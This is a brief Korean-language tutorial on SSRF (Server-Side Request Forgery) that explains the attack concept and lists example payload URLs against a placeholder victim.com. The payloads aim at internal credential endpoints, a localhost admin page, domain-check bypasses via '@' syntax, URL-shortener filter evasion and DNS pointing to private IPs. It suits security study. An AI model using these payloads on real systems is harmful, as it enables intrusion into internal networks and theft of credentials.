SSRF 취약점의 이해 및 공격 예시

1. SSRF 취약점의 이해

SSRF(Server-Side Request Forgery)는 서버 사이드에서 일어난 요청을 사용자가 변조하 여 사용자가 의도한 서버로 요청하거나 혹은 요청 자체를 변경하는 공격을 의미한다.

 

다음 그림은 A서버의 웹사이트를 통해 B서버의 다른 사이트의 정보를 가져와 처리한 후 그 내용을 브라저를 통하여 사용자 화면에 보여주는 서비스의 흐름을 나타내는 그림이다.

 

정상적인 흐름의 경우 A서버를 통해 B서버에 request를 전송하고, 그에 대한 데이터를 응 답으로 받아와 사용자에게 전달해아한다. 하지만 공격자가 B서버의 주소를 C서버로 변경할 경우 A서버는 C서버로 비정상요청을 보내게 되고 내부망에 존재하는 C서버의 값을 받아올 수 있게 된다. 이러한 과정을 통하여 공격자는 외부망을 통하여 내부망 서버에 존재하는 데이터들에 접근할 수 있고 해당 서버가 기업 내부 중요 데이터를 포함한 서버일 경우, 중요 정보들이 노출 될 위험이 있다.

 

2. SSRF 공격 예시

Payload 예시	설명
http://victim.com/?url=http://192.168.0.2/GetCredentials	응답값을 통해 내부망 주요정보 획득
http://victim.com/?url=http://loaclhost:8080/admin	외부 접근 차단된 admin페이지 접근
http://victim.com/?url=http://site.com:x@192.168.0.2/G etCredencials	도메인 체크를 우회하여 중요정보 획득
http://victim.com/?url=http://bit.ly/k8seMe4E	단축 URL을 이용한 Filter 우회, 내부망 연결
http://victim.com/?url=http://internal.hacker.com/GetCredentials	도메인을 사설IP로 설정해 주요 정보 획득 (Internal.hacker.com =>192.168.0.2)